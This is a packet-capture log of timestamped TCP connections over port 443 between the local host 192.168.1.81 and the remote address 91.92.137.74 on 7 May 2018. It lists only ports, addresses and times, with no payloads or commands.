Mai 7, 2018 14:50:22.512835026 MESZ 49170 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.631843090 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.631901026 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:22.632128954 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.637629986 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:22.637665987 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:23.138309956 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:23.138420105 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:23.787291050 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:23.787319899 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:24.865243912 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:24.865273952 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.183897018 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.184053898 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.184122086 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.184227943 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.184540987 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.185210943 MESZ 443 49172 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.185322046 MESZ 49172 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.303251028 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.303307056 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.303683043 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.304938078 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.304969072 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.906641006 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.906786919 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.916754007 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.916796923 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:25.922651052 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:25.922679901 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.280219078 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.280395031 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.280424118 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.283083916 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.283109903 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.284081936 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.309689045 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.309916973 MESZ 443 49173 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.310038090 MESZ 49173 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.429156065 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.429222107 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.429315090 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.430871010 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.430896044 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.932140112 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.933259964 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.971972942 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.972002983 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:26.982112885 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:26.982146978 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:27.343884945 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:27.345050097 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:27.345077991 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:27.346410036 MESZ 49174 443 192.168.1.81 91.92.137.74


Mai 7, 2018 14:50:27.346676111 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:27.346770048 MESZ 443 49174 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:27.352819920 MESZ 49174 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:27.574843884 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:27.574908972 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:27.575330019 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:27.576484919 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:27.576508999 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.308366060 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.308540106 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.629034996 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.629090071 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.638390064 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.638418913 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.874737978 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.875103951 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.875150919 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.875869989 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.876287937 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.876385927 MESZ 443 49175 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.876482964 MESZ 49175 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.993490934 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.993551970 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:28.993643999 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.995147943 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:28.995174885 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:29.783293962 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:29.783453941 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.258991957 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.259026051 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.267086029 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.267118931 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.494457006 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.494595051 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.494617939 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.496949911 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.496969938 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.497054100 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.497248888 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.497328043 MESZ 443 49176 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.497330904 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.497392893 MESZ 49176 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.613559961 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.613604069 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:30.613836050 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.615142107 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:30.615169048 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:31.155294895 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:31.155441046 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.049947977 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.049983978 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:32.056523085 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.056551933 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:32.423326015 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:32.423460007 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.423501968 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:32.423994064 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.424221992 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.424592018 MESZ 443 49177 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:32.427001953 MESZ 49177 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.551448107 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.551506042 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:32.551575899 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.552609921 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:32.552643061 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.204575062 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.205807924 MESZ 49178 443 192.168.1.81 91.92.137.74


Mai 7, 2018 14:50:33.247412920 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:33.247442007 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.253530025 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:33.253554106 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.667110920 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.667279959 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:33.667299986 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.671252966 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:33.942887068 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:33.943125963 MESZ 443 49178 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:33.943236113 MESZ 49178 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.109277964 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.109327078 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:34.109388113 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.110445023 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.110465050 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:34.728581905 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:34.728786945 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.739916086 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.739959955 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:34.979110003 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:34.979147911 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:35.242108107 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:35.242212057 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.242244005 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:35.242779016 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.242798090 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:35.243048906 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.249870062 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.250014067 MESZ 443 49179 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:35.250087976 MESZ 49179 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.416445017 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.416495085 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:35.416601896 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.417680979 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:35.417711973 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.371347904 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.371449947 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.507368088 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.507404089 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.513804913 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.513834000 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.751724005 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.751858950 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.751882076 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.752301931 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.752329111 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.752739906 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.752878904 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.753246069 MESZ 443 49180 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.753365993 MESZ 49180 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.881068945 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.881135941 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:36.881257057 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.882481098 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:36.882513046 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:37.597094059 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:37.597424984 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:37.619831085 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:37.619896889 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:37.628448009 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:37.628484011 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.197602034 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.197900057 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.197922945 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.200196981 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.200443983 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.200539112 MESZ 443 49181 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.200614929 MESZ 49181 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.321367025 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.321429968 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.321506977 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.322752953 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.322787046 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.880775928 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.880918026 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.935354948 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.935383081 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:38.943293095 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:38.943315029 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:39.156116962 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:39.156312943 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.156339884 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:39.159090996 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.159399033 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.159475088 MESZ 443 49182 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:39.163074970 MESZ 49182 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.405277967 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.405330896 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:39.405494928 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.406667948 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:39.406692982 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.033966064 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.034140110 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.499103069 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.499140024 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.507280111 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.507307053 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.767522097 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.768290997 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.768315077 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.769120932 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.769397020 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.769479990 MESZ 443 49183 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.769581079 MESZ 49183 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.894728899 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.894793987 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:40.894901991 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.896469116 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:40.896495104 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:41.553051949 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:41.553155899 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:41.570770979 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:41.570797920 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:41.577754021 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:41.577780962 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:41.882117987 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:41.882273912 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:41.882298946 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:41.882741928 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.071378946 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.071628094 MESZ 443 49184 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:42.071703911 MESZ 49184 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.193461895 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.193521023 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:42.193605900 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.194806099 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.194833040 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:42.883234024 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:42.883326054 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.893348932 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.893408060 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:42.899681091 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:42.899741888 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:43.117010117 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:43.117193937 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.117219925 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:43.117301941 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.117316008 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:43.117381096 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.117687941 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.118493080 MESZ 443 49185 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:43.118572950 MESZ 49185 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.295922995 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.295981884 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:43.296047926 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.297276020 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:43.297308922 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.343305111 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.343549967 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.359425068 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.359469891 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.366568089 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.366625071 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.759128094 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.759366035 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.759386063 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.759706974 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.759895086 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.760457993 MESZ 443 49186 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.760829926 MESZ 49186 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.881341934 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.881387949 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:44.881453037 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.882597923 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:44.882620096 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.361540079 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.361718893 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.374263048 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.374298096 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.397955894 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.397989035 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.742742062 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.742867947 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.742893934 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.747850895 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.747878075 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.751065969 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.940656900 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:45.940871954 MESZ 443 49187 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:45.940980911 MESZ 49187 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.064347029 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.064400911 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:46.064496994 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.066571951 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.066603899 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:46.842030048 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:46.842223883 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.853333950 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.853368044 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:46.859759092 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:46.859785080 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.082317114 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.082489014 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.082534075 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.083082914 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.083105087 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.084336042 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.148824930 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.149027109 MESZ 443 49188 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.150391102 MESZ 49188 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.269927025 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.269982100 MESZ 443 49189 91.92.137.74 192.168.1.81

Mai 7, 2018 14:50:47.270064116 MESZ 49189 443 192.168.1.81 91.92.137.74

Mai 7, 2018 14:50:47.271325111 MESZ 49189 443 192.168.1.81 91.92.137.74

